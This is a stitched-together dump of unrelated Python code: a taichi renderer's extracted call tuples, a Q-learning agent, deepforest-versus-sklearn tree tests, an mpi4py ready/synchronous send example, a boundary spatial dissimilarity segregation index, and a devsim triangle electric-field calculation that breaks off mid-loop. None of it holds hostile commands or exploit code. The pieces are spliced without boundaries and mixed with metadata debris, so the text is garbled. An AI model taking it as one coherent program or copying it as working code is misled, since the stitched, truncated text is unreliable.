'()\n', (1358, 1360), True, 'import taichi as ti\n'), ((1382, 1393), 'taichi.random', 'ti.random', ([], {}), '()\n', (1391, 1393), True, 'import taichi as ti\n'), ((1528, 1545), 'renderer_utils.reflect', 'reflect', (['indir', 'n'], {}), '(indir, n)\n', (1535, 1545), False, 'from renderer_utils import ray_aabb_intersection, intersect_sphere, ray_plane_intersect, reflect, refract\n'), ((1586, 1602), 'taichi.dot', 'ti.dot', (['indir', 'n'], {}), '(indir, n)\n', (1592, 1602), True, 'import taichi as ti\n'), ((1833, 1865), 'renderer_utils.refract', 'refract', (['indir', 'outn', 'ni_over_nt'], {}), '(indir, outn, ni_over_nt)\n', (1840, 1865), False, 'from renderer_utils import ray_aabb_intersection, intersect_sphere, ray_plane_intersect, reflect, refract\n'), ((2462, 2488), 'taichi.Vector', 'ti.Vector', (['[1.0, 1.0, 1.0]'], {}), '([1.0, 1.0, 1.0])\n', (2471, 2488), True, 'import taichi as ti\n'), ((2723, 2749), 'taichi.Vector', 'ti.Vector', (['[0.8, 0.5, 0.4]'], {}), '([0.8, 0.5, 0.4])\n', (2732, 2749), True, 'import taichi as ti\n'), ((3029, 3055), 'taichi.Vector', 'ti.Vector', (['[1.0, 0.0, 0.0]'], {}), '([1.0, 0.0, 0.0])\n', (3038, 3055), True, 'import taichi as ti\n'), ((3341, 3367), 'taichi.Vector', 'ti.Vector', (['[0.0, 1.0, 0.0]'], {}), '([0.0, 1.0, 0.0])\n', (3350, 3367), True, 'import taichi as ti\n'), ((3653, 3679), 'taichi.Vector', 'ti.Vector', (['[1.0, 1.0, 1.0]'], {}), '([1.0, 1.0, 1.0])\n', (3662, 3679), True, 'import taichi as ti\n'), ((3963, 3989), 'taichi.Vector', 'ti.Vector', (['[1.0, 1.0, 1.0]'], {}), '([1.0, 1.0, 1.0])\n', (3972, 3989), True, 'import taichi as ti\n'), ((4272, 4298), 'taichi.Vector', 'ti.Vector', (['[1.0, 1.0, 1.0]'], {}), '([1.0, 1.0, 1.0])\n', (4281, 4298), True, 'import taichi as ti\n'), ((5835, 5847), 'numpy.sqrt', 'np.sqrt', (['img'], {}), '(img)\n', (5842, 5847), True, 'import numpy as np\n'), ((1969, 1980), 'taichi.random', 'ti.random', ([], {}), '()\n', (1978, 1980), True, 'import taichi as ti\n'), ((2010, 2027), 'renderer_utils.reflect', 'reflect', (['indir', 'n'], {}), '(indir, n)\n', (2017, 2027), False, 'from renderer_utils import ray_aabb_intersection, intersect_sphere, ray_plane_intersect, reflect, refract\n'), ((1265, 1291), 'taichi.Vector', 'ti.Vector', (['[0.0, 1.0, 0.0]'], {}), '([0.0, 1.0, 0.0])\n', (1274, 1291), True, 'import taichi as ti\n'), ((1445, 1456), 'taichi.cos', 'ti.cos', (['phi'], {}), '(phi)\n', (1451, 1456), True, 'import taichi as ti\n'), ((1463, 1474), 'taichi.sin', 'ti.sin', (['phi'], {}), '(phi)\n', (1469, 1474), True, 'import taichi as ti\n'), ((5654, 5665), 'time.time', 'time.time', ([], {}), '()\n', (5663, 5665), False, 'import time\n'), ((4524, 4535), 'taichi.random', 'ti.random', ([], {}), '()\n', (4533, 4535), True, 'import taichi as ti\n'), ((4604, 4615), 'taichi.random', 'ti.random', ([], {}), '()\n', (4613, 4615), True, 'import taichi as ti\n')] |
import numpy as np
class QAgent(object):
""" Taken from tf_rl/examples/Q_Learning """
def __init__(self, num_state, num_action, gamma=0.95):
self._num_action = num_action
self._gamma = gamma
self.Q = np.zeros((num_state, num_action))
def select_action(self, state, epsilon=1.0):
if np.random.random() <= epsilon:
return np.random.choice(a=np.arange(self._num_action), p=np.ones(self._num_action) / self._num_action)
else:
return np.argmax(self.Q[state])
def select_action_eval(self, state):
return np.argmax(self.Q[state])
def update(self, state, action, reward, next_state, alpha):
# === I don't know why tho, self.gamma = 0.99 does not converge in Q-learning ===
# self.Q[state][action] += alpha * (reward + self.gamma * np.max(self.Q[next_state]) - self.Q[state][action])
self.Q[state][action] += alpha * (reward + 1. * np.max(self.Q[next_state]) - self.Q[state][action]) | [
"numpy.argmax",
"numpy.zeros",
"numpy.ones",
"numpy.max",
"numpy.random.random",
"numpy.arange"
] | [((234, 267), 'numpy.zeros', 'np.zeros', (['(num_state, num_action)'], {}), '((num_state, num_action))\n', (242, 267), True, 'import numpy as np\n'), ((590, 614), 'numpy.argmax', 'np.argmax', (['self.Q[state]'], {}), '(self.Q[state])\n', (599, 614), True, 'import numpy as np\n'), ((329, 347), 'numpy.random.random', 'np.random.random', ([], {}), '()\n', (345, 347), True, 'import numpy as np\n'), ((508, 532), 'numpy.argmax', 'np.argmax', (['self.Q[state]'], {}), '(self.Q[state])\n', (517, 532), True, 'import numpy as np\n'), ((398, 425), 'numpy.arange', 'np.arange', (['self._num_action'], {}), '(self._num_action)\n', (407, 425), True, 'import numpy as np\n'), ((429, 454), 'numpy.ones', 'np.ones', (['self._num_action'], {}), '(self._num_action)\n', (436, 454), True, 'import numpy as np\n'), ((944, 970), 'numpy.max', 'np.max', (['self.Q[next_state]'], {}), '(self.Q[next_state])\n', (950, 970), True, 'import numpy as np\n')] |
"""
Testing cases here make sure that the outputs of the reduced implementation
on `DecisionTreeClassifier` and `ExtraTreeClassifier` are exactly the same as
the original version in Scikit-Learn after the data binning.
"""
import pytest
from numpy.testing import assert_array_equal
from sklearn.tree import (
DecisionTreeClassifier as sklearn_DecisionTreeClassifier,
)
from sklearn.tree import (
DecisionTreeRegressor as sklearn_DecisionTreeRegressor,
)
from sklearn.tree import ExtraTreeClassifier as sklearn_ExtraTreeClassifier
from sklearn.tree import ExtraTreeRegressor as sklearn_ExtraTreeRegressor
# Load utils
from sklearn.model_selection import train_test_split
from sklearn.ensemble._hist_gradient_boosting.binning import _BinMapper
# Toy classification datasets
from sklearn.datasets import load_iris, load_wine, load_boston
from deepforest import DecisionTreeClassifier
from deepforest import ExtraTreeClassifier
from deepforest import DecisionTreeRegressor
from deepforest import ExtraTreeRegressor
test_size = 0.42
random_state = 42
@pytest.mark.parametrize("load_func", [load_iris, load_wine])
def test_tree_classifier_proba(load_func):
X, y = load_func(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=test_size, random_state=random_state
)
# Data binning
binner = _BinMapper(random_state=random_state)
X_train_binned = binner.fit_transform(X_train)
X_test_binned = binner.transform(X_test)
# Ours
model = DecisionTreeClassifier(random_state=random_state)
model.fit(X_train_binned, y_train)
actual_pred = model.predict(X_test_binned)
actual_proba = model.predict_proba(X_test_binned)
# Sklearn
model = sklearn_DecisionTreeClassifier(random_state=random_state)
model.fit(X_train_binned, y_train)
expected_pred = model.predict(X_test_binned)
expected_proba = model.predict_proba(X_test_binned)
assert_array_equal(actual_pred, expected_pred)
assert_array_equal(actual_proba, expected_proba)
@pytest.mark.parametrize("load_func", [load_iris, load_wine])
def test_extra_tree_classifier_proba(load_func):
X, y = load_func(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=test_size, random_state=random_state
)
# Data binning
binner = _BinMapper(random_state=random_state)
X_train_binned = binner.fit_transform(X_train)
X_test_binned = binner.transform(X_test)
# Ours
model = ExtraTreeClassifier(random_state=random_state)
model.fit(X_train_binned, y_train)
actual_pred = model.predict(X_test_binned)
actual_proba = model.predict_proba(X_test_binned)
# Sklearn
model = sklearn_ExtraTreeClassifier(random_state=random_state)
model.fit(X_train_binned, y_train)
expected_pred = model.predict(X_test_binned)
expected_proba = model.predict_proba(X_test_binned)
assert_array_equal(actual_pred, expected_pred)
assert_array_equal(actual_proba, expected_proba)
@pytest.mark.parametrize("load_func", [load_boston])
def test_tree_regressor_pred(load_func):
X, y = load_func(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=test_size, random_state=random_state
)
# Data binning
binner = _BinMapper(random_state=random_state)
X_train_binned = binner.fit_transform(X_train)
X_test_binned = binner.transform(X_test)
# Ours
model = DecisionTreeRegressor(random_state=random_state)
model.fit(X_train_binned, y_train)
actual_pred = model.predict(X_test_binned)
# Sklearn
model = sklearn_DecisionTreeRegressor(random_state=random_state)
model.fit(X_train_binned, y_train)
expected_pred = model.predict(X_test_binned)
assert_array_equal(actual_pred, expected_pred)
@pytest.mark.parametrize("load_func", [load_boston])
def test_extra_tree_regressor_pred(load_func):
X, y = load_func(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=test_size, random_state=random_state
)
# Data binning
binner = _BinMapper(random_state=random_state)
X_train_binned = binner.fit_transform(X_train)
X_test_binned = binner.transform(X_test)
# Ours
model = ExtraTreeRegressor(random_state=random_state)
model.fit(X_train_binned, y_train)
actual_pred = model.predict(X_test_binned)
# Sklearn
model = sklearn_ExtraTreeRegressor(random_state=random_state)
model.fit(X_train_binned, y_train)
expected_pred = model.predict(X_test_binned)
assert_array_equal(actual_pred, expected_pred)
| [
"sklearn.tree.DecisionTreeRegressor",
"sklearn.model_selection.train_test_split",
"numpy.testing.assert_array_equal",
"deepforest.DecisionTreeClassifier",
"sklearn.tree.DecisionTreeClassifier",
"sklearn.tree.ExtraTreeRegressor",
"deepforest.ExtraTreeClassifier",
"deepforest.DecisionTreeRegressor",
"... | [((1062, 1122), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""load_func"""', '[load_iris, load_wine]'], {}), "('load_func', [load_iris, load_wine])\n", (1085, 1122), False, 'import pytest\n'), ((2047, 2107), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""load_func"""', '[load_iris, load_wine]'], {}), "('load_func', [load_iris, load_wine])\n", (2070, 2107), False, 'import pytest\n'), ((3031, 3082), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""load_func"""', '[load_boston]'], {}), "('load_func', [load_boston])\n", (3054, 3082), False, 'import pytest\n'), ((3840, 3891), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""load_func"""', '[load_boston]'], {}), "('load_func', [load_boston])\n", (3863, 3891), False, 'import pytest\n'), ((1244, 1314), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'y'], {'test_size': 'test_size', 'random_state': 'random_state'}), '(X, y, test_size=test_size, random_state=random_state)\n', (1260, 1314), False, 'from sklearn.model_selection import train_test_split\n'), ((1362, 1399), 'sklearn.ensemble._hist_gradient_boosting.binning._BinMapper', '_BinMapper', ([], {'random_state': 'random_state'}), '(random_state=random_state)\n', (1372, 1399), False, 'from sklearn.ensemble._hist_gradient_boosting.binning import _BinMapper\n'), ((1520, 1569), 'deepforest.DecisionTreeClassifier', 'DecisionTreeClassifier', ([], {'random_state': 'random_state'}), '(random_state=random_state)\n', (1542, 1569), False, 'from deepforest import DecisionTreeClassifier\n'), ((1737, 1794), 'sklearn.tree.DecisionTreeClassifier', 'sklearn_DecisionTreeClassifier', ([], {'random_state': 'random_state'}), '(random_state=random_state)\n', (1767, 1794), True, 'from sklearn.tree import DecisionTreeClassifier as sklearn_DecisionTreeClassifier\n'), ((1944, 1990), 'numpy.testing.assert_array_equal', 'assert_array_equal', (['actual_pred', 'expected_pred'], {}), '(actual_pred, expected_pred)\n', (1962, 1990), False, 'from numpy.testing import assert_array_equal\n'), ((1995, 2043), 'numpy.testing.assert_array_equal', 'assert_array_equal', (['actual_proba', 'expected_proba'], {}), '(actual_proba, expected_proba)\n', (2013, 2043), False, 'from numpy.testing import assert_array_equal\n'), ((2234, 2304), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'y'], {'test_size': 'test_size', 'random_state': 'random_state'}), '(X, y, test_size=test_size, random_state=random_state)\n', (2250, 2304), False, 'from sklearn.model_selection import train_test_split\n'), ((2352, 2389), 'sklearn.ensemble._hist_gradient_boosting.binning._BinMapper', '_BinMapper', ([], {'random_state': 'random_state'}), '(random_state=random_state)\n', (2362, 2389), False, 'from sklearn.ensemble._hist_gradient_boosting.binning import _BinMapper\n'), ((2510, 2556), 'deepforest.ExtraTreeClassifier', 'ExtraTreeClassifier', ([], {'random_state': 'random_state'}), '(random_state=random_state)\n', (2529, 2556), False, 'from deepforest import ExtraTreeClassifier\n'), ((2724, 2778), 'sklearn.tree.ExtraTreeClassifier', 'sklearn_ExtraTreeClassifier', ([], {'random_state': 'random_state'}), '(random_state=random_state)\n', (2751, 2778), True, 'from sklearn.tree import ExtraTreeClassifier as sklearn_ExtraTreeClassifier\n'), ((2928, 2974), 'numpy.testing.assert_array_equal', 'assert_array_equal', (['actual_pred', 'expected_pred'], {}), '(actual_pred, expected_pred)\n', (2946, 2974), False, 'from numpy.testing import assert_array_equal\n'), ((2979, 3027), 'numpy.testing.assert_array_equal', 'assert_array_equal', (['actual_proba', 'expected_proba'], {}), '(actual_proba, expected_proba)\n', (2997, 3027), False, 'from numpy.testing import assert_array_equal\n'), ((3202, 3272), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'y'], {'test_size': 'test_size', 'random_state': 'random_state'}), '(X, y, test_size=test_size, random_state=random_state)\n', (3218, 3272), False, 'from sklearn.model_selection import train_test_split\n'), ((3320, 3357), 'sklearn.ensemble._hist_gradient_boosting.binning._BinMapper', '_BinMapper', ([], {'random_state': 'random_state'}), '(random_state=random_state)\n', (3330, 3357), False, 'from sklearn.ensemble._hist_gradient_boosting.binning import _BinMapper\n'), ((3478, 3526), 'deepforest.DecisionTreeRegressor', 'DecisionTreeRegressor', ([], {'random_state': 'random_state'}), '(random_state=random_state)\n', (3499, 3526), False, 'from deepforest import DecisionTreeRegressor\n'), ((3640, 3696), 'sklearn.tree.DecisionTreeRegressor', 'sklearn_DecisionTreeRegressor', ([], {'random_state': 'random_state'}), '(random_state=random_state)\n', (3669, 3696), True, 'from sklearn.tree import DecisionTreeRegressor as sklearn_DecisionTreeRegressor\n'), ((3790, 3836), 'numpy.testing.assert_array_equal', 'assert_array_equal', (['actual_pred', 'expected_pred'], {}), '(actual_pred, expected_pred)\n', (3808, 3836), False, 'from numpy.testing import assert_array_equal\n'), ((4016, 4086), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'y'], {'test_size': 'test_size', 'random_state': 'random_state'}), '(X, y, test_size=test_size, random_state=random_state)\n', (4032, 4086), False, 'from sklearn.model_selection import train_test_split\n'), ((4134, 4171), 'sklearn.ensemble._hist_gradient_boosting.binning._BinMapper', '_BinMapper', ([], {'random_state': 'random_state'}), '(random_state=random_state)\n', (4144, 4171), False, 'from sklearn.ensemble._hist_gradient_boosting.binning import _BinMapper\n'), ((4292, 4337), 'deepforest.ExtraTreeRegressor', 'ExtraTreeRegressor', ([], {'random_state': 'random_state'}), '(random_state=random_state)\n', (4310, 4337), False, 'from deepforest import ExtraTreeRegressor\n'), ((4451, 4504), 'sklearn.tree.ExtraTreeRegressor', 'sklearn_ExtraTreeRegressor', ([], {'random_state': 'random_state'}), '(random_state=random_state)\n', (4477, 4504), True, 'from sklearn.tree import ExtraTreeRegressor as sklearn_ExtraTreeRegressor\n'), ((4598, 4644), 'numpy.testing.assert_array_equal', 'assert_array_equal', (['actual_pred', 'expected_pred'], {}), '(actual_pred, expected_pred)\n', (4616, 4644), False, 'from numpy.testing import assert_array_equal\n')] |
## mpiexec -n 2 python ex-2.34.py
# Use of ready-mode and synchonous-mode
# --------------------------------------------------------------------
from mpi4py import MPI
try:
import numpy
except ImportError:
raise SystemExit
if MPI.COMM_WORLD.Get_size() < 2:
raise SystemExit
# --------------------------------------------------------------------
comm = MPI.COMM_WORLD
buff = numpy.empty((1000,2), dtype='f', order='fortran')
rank = comm.Get_rank()
if rank == 0:
req1 = comm.Irecv([buff[:, 0], MPI.FLOAT], 1, 1)
req2 = comm.Irecv([buff[:, 1], MPI.FLOAT], 1, 2)
status = [MPI.Status(), MPI.Status()]
MPI.Request.Waitall([req1, req2], status)
elif rank == 1:
buff[:, 0] = 5
buff[:, 1] = 7
comm.Ssend([buff[:, 1], MPI.FLOAT], 0, 2)
comm.Rsend([buff[:, 0], MPI.FLOAT], 0, 1)
# --------------------------------------------------------------------
all = numpy.all
if rank == 0:
assert all(buff[:, 0] == 5)
assert all(buff[:, 1] == 7)
assert status[0].source == 1
assert status[0].tag == 1
assert status[1].source == 1
assert status[1].tag == 2
# --------------------------------------------------------------------
| [
"numpy.empty",
"mpi4py.MPI.Status",
"mpi4py.MPI.COMM_WORLD.Get_size",
"mpi4py.MPI.Request.Waitall"
] | [((393, 443), 'numpy.empty', 'numpy.empty', (['(1000, 2)'], {'dtype': '"""f"""', 'order': '"""fortran"""'}), "((1000, 2), dtype='f', order='fortran')\n", (404, 443), False, 'import numpy\n'), ((238, 263), 'mpi4py.MPI.COMM_WORLD.Get_size', 'MPI.COMM_WORLD.Get_size', ([], {}), '()\n', (261, 263), False, 'from mpi4py import MPI\n'), ((634, 675), 'mpi4py.MPI.Request.Waitall', 'MPI.Request.Waitall', (['[req1, req2]', 'status'], {}), '([req1, req2], status)\n', (653, 675), False, 'from mpi4py import MPI\n'), ((602, 614), 'mpi4py.MPI.Status', 'MPI.Status', ([], {}), '()\n', (612, 614), False, 'from mpi4py import MPI\n'), ((616, 628), 'mpi4py.MPI.Status', 'MPI.Status', ([], {}), '()\n', (626, 628), False, 'from mpi4py import MPI\n')] |
"""Boundary Spatial Dissimilarity Index."""
__author__ = "<NAME> <<EMAIL>>, <NAME> <<EMAIL>> and <NAME> <<EMAIL>>"
import numpy as np
from sklearn.metrics.pairwise import manhattan_distances
from .._base import (SingleGroupIndex, SpatialExplicitIndex,
_return_length_weighted_w)
from .dissim import _dissim
def _boundary_spatial_dissim(data, group_pop_var, total_pop_var, standardize=False):
"""Calculation of Boundary Spatial Dissimilarity index.
Parameters
----------
data : a geopandas DataFrame with a geometry column.
group_pop_var : string
The name of variable in data that contains the population size of the group of interest
total_pop_var : string
The name of variable in data that contains the total population of the unit
standardize : boolean
A condition for row standardisation of the weights matrices. If True, the values of cij in the formulas gets row standardized.
For the sake of comparison, the seg R package of Hong, Seong-Yun, David O'Sullivan, and Yukio Sadahiro. "Implementing spatial segregation measures in R." PloS one 9.11 (2014): e113767.
works by default without row standardization. That is, directly with border length.
Returns
----------
statistic : float
Boundary Spatial Dissimilarity Index
core_data : a geopandas DataFrame
A geopandas DataFrame that contains the columns used to perform the estimate.
Notes
-----
The formula is based on Hong, Seong-Yun, David O'Sullivan, and Yukio Sadahiro. "Implementing spatial segregation measures in R." PloS one 9.11 (2014): e113767.
Original paper by Wong, <NAME>. "Spatial indices of segregation." Urban studies 30.3 (1993): 559-572.
References: :cite:`hong2014implementing` and :cite:`wong1993spatial`.
"""
if type(standardize) is not bool:
raise TypeError("std is not a boolean object")
D = _dissim(data, group_pop_var, total_pop_var)[0]
# If a unit has zero population, the group of interest frequency is zero
data = data.assign(
pi=np.where(
data[total_pop_var] == 0, 0, data[group_pop_var] / data[total_pop_var]
)
)
if not standardize:
cij = _return_length_weighted_w(data).full()[0]
else:
cij = _return_length_weighted_w(data).full()[0]
cij = cij / cij.sum(axis=1).reshape((cij.shape[0], 1))
# manhattan_distances used to compute absolute distances
num = np.multiply(manhattan_distances(data[["pi"]]), cij).sum()
den = cij.sum()
BSD = D - num / den
core_data = data[[group_pop_var, total_pop_var, data.geometry.name]]
return BSD, core_data
class BoundarySpatialDissim(SingleGroupIndex, SpatialExplicitIndex):
"""Boundary-Area Dissimilarity Index.
Parameters
----------
data : pandas.DataFrame or geopandas.GeoDataFrame, required
dataframe or geodataframe if spatial index holding data for location of interest
group_pop_var : str, required
name of column on dataframe holding population totals for focal group
total_pop_var : str, required
name of column on dataframe holding total overall population
standardize : boolean
A condition for row standardisation of the weights matrices. If True, the values of cij in the formulas gets row standardized.
For the sake of comparison, the seg R package of Hong, Seong-Yun, <NAME>, and <NAME>. "Implementing spatial segregation measures in R." PloS one 9.11 (2014): e113767.
works by default with row standardization.
Attributes
----------
statistic : float
Boundary Area Index
core_data : a pandas DataFrame
A pandas DataFrame that contains the columns used to perform the estimate.
Notes
-----
The formula is based on Hong, Seong-Yun, <NAME>, and <NAME>. "Implementing spatial segregation measures in R." PloS one 9.11 (2014): e113767.
Original paper by Wong, <NAME>. "Spatial indices of segregation." Urban studies 30.3 (1993): 559-572.
References: :cite:`hong2014implementing` and :cite:`wong1993spatial`.
"""
def __init__(
self, data, group_pop_var, total_pop_var, w=None, standardize=True, **kwargs
):
"""Init."""
SingleGroupIndex.__init__(self, data, group_pop_var, total_pop_var)
SpatialExplicitIndex.__init__(self,)
self.standardize = standardize
aux = _boundary_spatial_dissim(
self.data, self.group_pop_var, self.total_pop_var, self.standardize
)
self.statistic = aux[0]
self.core_data = aux[1]
self._function = _boundary_spatial_dissim
| [
"numpy.where",
"sklearn.metrics.pairwise.manhattan_distances"
] | [((2119, 2204), 'numpy.where', 'np.where', (['(data[total_pop_var] == 0)', '(0)', '(data[group_pop_var] / data[total_pop_var])'], {}), '(data[total_pop_var] == 0, 0, data[group_pop_var] / data[total_pop_var]\n )\n', (2127, 2204), True, 'import numpy as np\n'), ((2522, 2555), 'sklearn.metrics.pairwise.manhattan_distances', 'manhattan_distances', (["data[['pi']]"], {}), "(data[['pi']])\n", (2541, 2555), False, 'from sklearn.metrics.pairwise import manhattan_distances\n')] |
# Copyright 2013 Devsim LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# The purpose is to verify our triangle element field calculation.
# It is based on Laux's weighting scheme
#@article{Laux:1985,
# author = {Laux, <NAME>. and Byrnes, <NAME>.},
# title = {Semiconductor device simulation using generalized mobility models},
# journal = {IBM J. Res. Dev.},
# issue_date = {May 1985},
# volume = {29},
# number = {dim},
# month = may,
# year = {1985},
# issn = {0018-8646},
# pages = {289--301},
# numpages = {13},
# url = {http://dx.doi.org/10.1147/rd.293.0289},
# doi = {10.1147/rd.293.0289},
# acmid = {1012099},
# publisher = {IBM Corp.},
# address = {Riverton, NJ, USA},
#}
# handle the new way of integer division
from __future__ import division
import sys
try:
import numpy
import numpy.linalg
except:
print("numpy is not available with your installation and is not being run")
sys.exit(0)
from devsim import *
#from collections import OrderedDict
dim = None
nee = None
nen = None
directions = ('x', 'y', 'z')
def SetDimension(dimension):
global dim
global nee
global nen
if dimension == 2:
dim = 2
nee = 3
nen = 3
elif dimension == 3:
dim = 3
nee = 6
nen = 4
# nen edges make up the dense matrix calculation for 1 node
# the element corresponds to 1 of n tetrahedron
# node indexes are the element edge quantities
def GetElementData(element_index, node_indexes):
element_data = {}
nodes = []
edge_node_list = []
for j in range(nee):
index = nee*element_index + j
enodes = []
for i in node_indexes:
enodes.append(i[index])
edge_node_list.append(enodes)
element_data['edge_node_list'] = edge_node_list
nodes = sorted(edge_node_list[0])
element_data['node_indexes'] = nodes
node_to_edge_indexes = []
n0_indexes = node_indexes[0]
n1_indexes = node_indexes[1]
for ni in nodes:
edge_indexes = []
for j in range(nee):
ei = nee*element_index + j
if (n0_indexes[ei] == ni) or (n1_indexes[ei] == ni):
edge_indexes.append(j)
node_to_edge_indexes.append(edge_indexes)
element_data['node_to_edge_indexes'] = node_to_edge_indexes
element_data['element_index'] = element_index
return element_data
def GetNodeMatrices(element_data, unit_vectors):
matrices = []
ei = element_data['element_index']
for i in range(nen):
edge_indexes = element_data['node_to_edge_indexes'][i]
M = numpy.zeros((dim,dim))
for j in range(dim):
edge_index = nee * ei + edge_indexes[j]
for k in range(dim):
M[j][k] = unit_vectors[k][edge_index]
matrices.append(M)
return matrices
def CalculateEField(element_data, scalar_efield):
# calculated for each of the nen nodes on the element
vector_efields = []
ei = element_data['element_index']
matrices = element_data['matrices']
for i in range(nen):
edge_indexes = element_data['node_to_edge_indexes'][i]
B = numpy.zeros((dim,1))
for j in range(dim):
edge_index = nee * ei + edge_indexes[j]
B[j] = scalar_efield[edge_index]
ans = numpy.linalg.solve(matrices[i], B)
vector_efields.append(ans)
return vector_efields
def CalculateEFieldDerivatives(element_data, scalar_efield_derivatives):
vector_efield_derivatives = []
ei = element_data['element_index']
matrices = element_data['matrices']
# These are the derivatives for all of the nodes of the whole element
node_indexes = element_data['node_indexes']
for i in range(nen):
edge_indexes = element_data['node_to_edge_indexes'][i]
B = numpy.zeros((dim,nen))
for j in range(dim):
edge_index = edge_indexes[j]
input_edge_index = nee * ei + edge_index
edge_node_list = element_data['edge_node_list'][edge_index]
# these are the derivative nodes corresponding
for k in range(nen):
# this is the node we are taking the derivative with respect to
# it is over the entire element
nk = node_indexes[k]
# are we in the head or tail node
val = 0.0
if nk == edge_node_list[0]:
val = scalar_efield_derivatives[0][input_edge_index]
elif nk == edge_node_list[1]:
val = scalar_efield_derivatives[1][input_edge_index]
B[j][k] = val
ans = numpy.linalg.solve(matrices[i], B)
vector_efield_derivatives.append(ans)
return vector_efield_derivatives
def CalculateFinalValues3D(element_data, vector_efields, output):
ei = element_data['element_index']
node_indexes = element_data['node_indexes']
edge_node_list = element_data['edge_node_list']
for i in range(nen):
edge_indexes = element_data['node_to_edge_indexes'][i]
#print len(edge_indexes)
#raise RuntimeError("STOP")
val = 0.5 * numpy.transpose(vector_efields[i][:,0])
for j in range(dim):
edge_index = edge_indexes[j]
#if (abs(edge_index) > 5):
# raise RuntimeError("PROBLEM")
output_edge_index = nee*ei + edge_index
output[output_edge_index,0:dim] += val
def CalculateFinalDerivatives3D(element_data, vector_efield_derivatives, output):
# now for the derivatives
ei = element_data['element_index']
node_indexes = element_data['node_indexes']
edge_node_list = element_data['edge_node_list']
for i in range(nen):
edge_indexes = element_data['node_to_edge_indexes'][i]
for j in range(dim):
edge_index = edge_indexes[j]
output_edge_index = nee*ei + edge_index
for k in range(nen):
# this are the derivatives corresponding to the ordered list of nodes on the entire element
nk = node_indexes[k]
#val = 0.5 * numpy.transpose(vector_efield_derivatives[i][:][k])
val = 0.5 * numpy.transpose(vector_efield_derivatives[i][:,k])
for kk in range(nen):
nkk = edge_node_list[edge_index][kk]
if nk == nkk:
row_stride = slice(dim*(kk+1),dim*(kk+2))
#print row_stride
output[output_edge_index, row_stride] += val
def CalculateFinalValues2D(element_data, vector_efields, ecouple, output):
ei = element_data['element_index']
# this is special weighting based on edge away from edge of interest
wts = numpy.zeros((nee,)) # this handles the weights summed into our edge
outs = numpy.zeros((nee,dim))
# iterate over our element nodes
node_to_edge_indexes = element_data['node_to_edge_indexes']
for i in range(nen):
edge_indexes = node_to_edge_indexes[i]
for j in edge_indexes:
for k in edge_indexes:
if j == k:
continue
wt = ecouple[nee*ei + k]
wts[j] += wt
outs[j] += wt * vector_efields[i][:,0]
for i in range(nee):
outs[i] /= wts[i]
output[nee*ei + i,0:dim] = numpy.transpose(outs[i])
def CalculateFinalDerivatives2D(element_data, vector_efield_derivatives, ecouple, output):
ei = element_data['element_index']
# this is special weighting based on edge away from edge of interest
wts = numpy.zeros((nee,)) # this handles the weights summed into our edge
outs = numpy.zeros((nee,nen*dim))
# iterate over our element nodes
node_indexes = element_data['node_indexes']
node_to_edge_indexes = element_data['node_to_edge_indexes']
edge_node_list = element_data['edge_node_list']
for i in range(nen):
edge_indexes = node_to_edge_indexes[i]
for j in edge_indexes:
for k in edge_indexes:
if j == k:
continue
wt = ecouple[nee*ei + k]
wts[j] += wt
for l in range(nen):
row_stride = slice(dim*l,dim*(l+1))
outs[j,row_stride] += wt * vector_efield_derivatives[i][:,l]
#outs[j,] += wt * vector_efields[i][:,0]
#val = 0.5 * numpy.transpose(vector_efield_derivatives[i][:,k])
for i in range(nee):
outs[i] /= wts[i]
for k in range(nen):
nk = node_indexes[k]
for kk in range(nen):
nkk = edge_node_list[i][kk]
if nk == nkk:
row_stride1 = slice(dim*(kk+1),dim*(kk+2))
row_stride2 = slice(dim*(k),dim*(k+1))
#print row_stride1
#print row_stride2
output[nee*ei + i,row_stride1] = numpy.transpose(outs[i, row_stride2])
break
def GetScalarField(device, region, name, mname):
element_model(device=device, region=region, name=name, equation=mname)
return numpy.array(get_element_model_values(device=device, region=region, name=name))
def GetScalarFieldDerivatives(device, region, name, mname, vname):
ret = []
for i in range(2):
oname = name + str(i)
iname = "%s:%s@n%d" % (mname, vname, i)
element_model(device=device, region=region, name=oname, equation=iname)
ret.append(get_element_model_values(device=device, region=region, name=oname))
return ret
def GetNodeIndexes(device, region):
ret = []
element_from_node_model(node_model="node_index", device=device, region=region)
for i in range(nen):
tmp = get_element_model_values(device=device, region=region, name="node_index@en%d" % i)
tmp = [int(x) for x in tmp]
ret.append(tmp)
return ret
def GetUnitVectors(device, region):
ret = []
for i in range(dim):
mname = "s%s" % directions[i]
element_model(device=device, region=region, name=mname, equation="unit%s" % directions[i])
ret.append(get_element_model_values(device=device, region=region, name=mname))
return ret
def SetupOutputCompare(device, region, model, variable, output):
element_from_edge_model(device=device, region=region, edge_model=model)
element_from_edge_model(device=device, region=region, edge_model=model, derivative=variable)
k = 0
for i in range(dim):
mname = "ElectricField_" + directions[i]
output[:,k] = numpy.array(get_element_model_values(device=device, region=region, name=mname))
print("%d %s" % (k, mname))
k += 1
for j in range(nen):
for i in range(dim):
mname = "ElectricField_" + directions[i]
dname = mname + ":Potential@en%d" % j
output[:,k] = numpy.array(get_element_model_values(device=device, region=region, name=dname))
print("%d %s" % (k, dname))
k += 1
def DoCompare(output, output_compare, number_test):
test2 = output[0:nee*number_test] - output_compare[0:nee*number_test]
print(numpy.linalg.norm(test2, ord=numpy.inf ))
for row in range(number_test):
for col in range(5):
sl1 = slice(nee*row,nee*(row+1))
sl2 = slice(dim*col,dim*(col+1))
